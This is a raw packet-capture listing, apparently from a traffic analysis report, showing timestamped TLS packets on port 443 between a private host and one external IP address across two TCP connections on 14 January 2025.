                                                                        Jan 14, 2025 05:12:37.981992960 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.982089996 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.982089996 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.982103109 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.982316017 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.982461929 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.982461929 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.982484102 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.982923985 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.982956886 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.983129025 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.983351946 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.983541012 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.983725071 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.983860970 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:37.983872890 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:37.984195948 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.190248013 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.190530062 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.257966995 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.258004904 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.258029938 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.258043051 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.258168936 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.258168936 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.258194923 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.258222103 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.258322001 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.258322001 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.258344889 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.258363962 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.258375883 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.258641958 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.258641958 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.258703947 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.258754969 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.258776903 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.258975029 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.259170055 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.259222984 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.259356022 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.259720087 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.259895086 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.260138035 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.260174036 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.260400057 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.260665894 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.466557026 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.466880083 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.557001114 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.557085037 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.557115078 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.557126999 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.557413101 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.557413101 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.557503939 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.557538033 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.557553053 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.557600021 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.557630062 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.557895899 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.557976961 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.558101892 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.558157921 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.558286905 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.558501959 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.558774948 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.559178114 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.559178114 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.559237957 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.559588909 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.559779882 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.766288996 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.766412973 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.890081882 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.890158892 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.890191078 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.890218019 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.890321016 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.890321016 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.890353918 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.890369892 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.890391111 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.890403986 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.890484095 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.890497923 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.890541077 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.890760899 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.890820026 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.890872002 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.890893936 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.891288996 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.891288996 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.891350031 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.891673088 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.891971111 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.892144918 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.892199039 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:38.892342091 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.892596960 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:38.892760038 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.102303982 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:39.102699995 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.242937088 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.243016005 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:39.243046999 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:39.243061066 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:39.243639946 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.243640900 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.243640900 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.243640900 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.243640900 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.243752003 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:39.243782997 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:39.243813992 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:39.243854046 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.244108915 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.244164944 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:39.244374990 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.244427919 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:39.244566917 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.244949102 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.244949102 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.245012045 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:39.245342970 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.245631933 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.245815992 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.450299025 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:39.450458050 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.625401974 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.625475883 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:39.625511885 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:39.625531912 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:39.625675917 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.625675917 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.625732899 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:39.625757933 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:39.625791073 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.625791073 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.625813007 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:39.625924110 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.625981092 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:39.626010895 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.626236916 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.626277924 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:39.626298904 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.626349926 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:39.626754999 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.626754999 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.626816988 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:39.627135992 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.627193928 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:39.627336025 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.627722025 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.627722979 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.628097057 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:39.834425926 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:39.834748030 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.049434900 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.049448967 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.049454927 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.049459934 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.049705029 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.049712896 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.049864054 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.049870014 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.050060987 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.050081015 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.050295115 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.050295115 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.050389051 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.050440073 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.050467014 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.050498962 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.050734043 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.050877094 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.050929070 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.051074982 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.051129103 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.051264048 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.051307917 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.051744938 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.051745892 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.051785946 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.052067041 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.052282095 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.052501917 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.258521080 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.258982897 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.490860939 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.490942955 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.490967989 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.490978003 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.491179943 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.491216898 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.491785049 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.491785049 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.491785049 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.491879940 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.491909027 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.491931915 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.491960049 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.492069960 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.492069960 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.492125988 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.492150068 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.492261887 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.492846012 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.492846012 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.492846012 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.492934942 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.492964029 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.493001938 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.493017912 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.493073940 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.493282080 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.493474960 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.493666887 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.493946075 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.493947029 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.494360924 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.702291965 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.702501059 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.968800068 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.968836069 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.968848944 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.969118118 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.969157934 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.969178915 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.969187975 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.969283104 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.969301939 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.969310045 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:40.969567060 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:40.969994068 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:41.465467930 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:42.187196016 CET49766443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:42.187228918 CET44349766118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:42.570905924 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:42.570988894 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:42.571208000 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:42.571307898 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:42.571341038 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:48.686867952 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:48.687088966 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:48.687477112 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:48.687477112 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:48.687510967 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:48.687525034 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.160831928 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.160895109 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.160947084 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.161031008 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.161055088 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.161068916 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.161287069 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.163882017 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.164024115 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.164303064 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.170460939 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.170789957 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.174065113 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.174360037 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.177654028 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.177872896 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.178102970 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.184109926 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.184279919 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.184279919 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.191560984 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.191884995 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.194789886 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.194948912 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.195132971 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.195132971 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.198137999 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.198390007 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.198479891 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.204941988 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.205219030 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.205219030 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.205219030 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.208463907 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.208627939 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.208827019 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.215266943 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.215601921 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.215775013 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.218750954 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.218911886 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.219091892 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.219093084 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.222393990 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.222611904 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.507869959 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.507993937 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.508368015 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.508368015 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.508446932 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.508796930 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.510582924 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.510931015 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.514136076 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.514513016 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.514513969 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.521013975 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.521265984 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.524461985 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.524800062 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.524800062 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.532464981 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.532805920 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.532805920 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.538472891 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.538731098 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.538731098 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.543232918 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.543659925 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.546675920 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.547024965 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.547024965 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.550018072 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.550551891 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.557014942 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.557356119 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.564791918 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.565138102 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.570003986 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.570216894 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.570216894 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.570216894 CET49767443192.168.11.20118.178.60.9
                                                                        Jan 14, 2025 05:12:49.612003088 CET44349767118.178.60.9192.168.11.20
                                                                        Jan 14, 2025 05:12:49.612349033 CET49767443192.168.11.20118.178.60.9
